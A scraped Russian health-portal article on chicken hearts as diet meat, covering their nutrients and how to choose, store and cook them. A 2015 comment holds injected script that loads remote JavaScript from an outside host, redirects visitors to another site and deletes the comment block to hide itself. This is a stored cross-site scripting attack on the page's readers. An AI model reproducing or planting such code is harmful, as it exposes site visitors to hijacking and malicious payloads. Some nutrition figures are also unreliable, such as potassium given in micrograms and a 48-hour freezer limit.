Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Куриное сердце: лучшее ди...  >>  Куриное сердце: лучшее диетическое мясо
 
Обратная связь
 

Куриное сердце: лучшее диетическое мясо

Размер шрифта
15 марта 2012 10:00
  • google_analytics: false
  • Нравится

Всем знакомые куриные потроха, оказывается, могут обладать незаменимыми питательными свойствами. Как хранить и готовить куриное сердце, чтобы сохранить его пищевую ценность?

1 

Куриное сердце относится к субпродуктам, или, как раньше называли, к потрохам. Сердце – мышечный орган, богатый белком (15-16 % от общей массы). Такой белок низкокалориен и легко усваивается. К тому же, сердечная мышца накапливает при жизни все необходимые для своей работы и микроэлементы: калий, магний, кальций, натрий. А ведь эти компоненты необходимы и для человеческого сердца. Также куриное сердце содержит витамины, необходимые для углеводного и белкового метаболизма – B1 и B2.

Такой элемент как калий необходим организму, чтобы электрический импульс распространялся без помех по мышечной и нервной ткани. Калий больше всего содержится в куриной грудке (430-440 мкг), но и в курином сердце его немало (260 мкг). К тому же, куриное сердце менее калорийно.

Как выбрать

Куриные сердца продаются трех видов: свежие, охлажденные и замороженные. Срок годности зависит от вида.
 

  1. Если потроха свежие или охлажденные, цвет должен быть темно-бордовым. Срок годности такого продукта не более 48 часов.

  2. Если продукт продается замороженным, в упаковке не должно быть кристалликов льда. Такое признак свидетельствует о том, что продукт уже размораживался, а это негативно сказывается на качестве.

Как хранить

После покупки свежего или охлажденного куриного сердца следует вскрыть упаковку и промыть продукт. Промытый товар уложить в вакуумный контейнер и поставить в холодильник или в морозильник. В холодильнике хранить следует не более 48 часов с момента выработки, а в морозильнике не более 48 часов с момента заморозки.

1

Как готовить

Куриное сердце лучше отварить в воде. При этом будут сохраняться микроэлементы. Отварное сердце можно потом припустить в керамической сковородке. Гарнир – овощное сотэ (болгарский перец с яблоками, припущенный в соку). Соус – йогуртово-горчичный.

Итак:

  • Куриное сердце богато микроэлементами.
  • Хранить охлажденное куриное сердце не более 2 суток.

Сюжеты по теме:
Куриное сердце

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.